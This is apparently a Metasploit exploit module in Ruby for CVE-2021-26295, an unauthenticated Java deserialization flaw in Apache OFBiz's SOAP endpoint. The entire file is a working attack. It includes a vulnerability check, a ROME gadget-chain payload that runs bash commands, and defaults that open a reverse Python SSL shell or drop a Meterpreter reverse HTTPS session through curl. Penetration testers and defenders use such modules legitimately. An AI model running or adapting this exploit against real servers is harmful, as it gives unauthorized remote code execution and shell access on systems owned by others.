##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::JavaDeserialization

  XML_NS = {
    'serResponse' => 'http://ofbiz.apache.org/service/',
    'soapenv' => 'http://schemas.xmlsoap.org/soap/envelope/'
  }.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apache OFBiz SOAP Java Deserialization',
        'Description' => %q{
          This module exploits a Java deserialization vulnerability in Apache
          OFBiz's unauthenticated SOAP endpoint /webtools/control/SOAPService for
          versions prior to 17.12.06.
        },
        'Author' => [
          'yumusb',           # original PoC
          'Spencer McIntyre', # metasploit module
          'wvu'               # metasploit module
        ],
        'References' => [
          [ 'CVE', '2021-26295' ],
          [ 'URL', 'https://github.com/yumusb/CVE-2021-26295-POC/blob/main/poc.py' ],
          [ 'URL', 'https://issues.apache.org/jira/browse/OFBIZ-12167' ]
        ],
        'DisclosureDate' => '2021-03-22', # NVD publish date
        'License' => MSF_LICENSE,
        'Privileged' => false,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper,
              'DefaultOptions' => {
                'CMDSTAGER::FLAVOR' => :curl,
                'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'
              }
            }
          ]
        ],
        'DefaultTarget' => 1,
        'DefaultOptions' => {
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      Opt::RPORT(8443),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  def check
    # Send an empty serialized object
    res = send_request_soap('')

    unless res
      return CheckCode::Unknown('Target did not respond to check.')
    end

    messages = {}
    res.get_xml_document.xpath('//soapenv:Envelope/soapenv:Body/serResponse:serResponse/serResponse:map-HashMap/serResponse:map-Entry', XML_NS).each do |entry|
      key = entry.xpath('serResponse:map-Key/serResponse:std-String/@value', XML_NS).to_s
      messages[key] = entry.xpath('serResponse:map-Value/serResponse:std-String/@value', XML_NS).to_s
    end

    if messages['errorMessage']&.start_with?('Problem deserializing object from byte array')
      return CheckCode::Vulnerable('Target can deserialize arbitrary data.')
    end

    CheckCode::Safe('Target cannot deserialize arbitrary data.')
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end
  end

  def execute_command(cmd, _opts = {})
    vprint_status("Executing command: #{cmd}")

    res = send_request_soap(
      # framework/webapp/lib/rome-0.9.jar
      generate_java_deserialization_for_command('ROME', 'bash', cmd)
    )

    unless res && res.code == 200
      fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")
    end

    print_good("Successfully executed command: #{cmd}")
  end

  def send_request_soap(data)
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/webtools/control/SOAPService'),
      'ctype' => 'text/xml',
      'data' => <<~XML
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
          <soapenv:Header/>
          <soapenv:Body>
            <ser>
              <map-HashMap>
                <map-Entry>
                  <map-Key>
                    <cus-obj>#{Rex::Text.to_hex(data, '')}</cus-obj>
                  </map-Key>
                  <map-Value>
                    <std-String value="http://#{Faker::Internet.domain_name}"/>
                  </map-Value>
                </map-Entry>
              </map-HashMap>
            </ser>
          </soapenv:Body>
        </soapenv:Envelope>
      XML
    )
  end

end
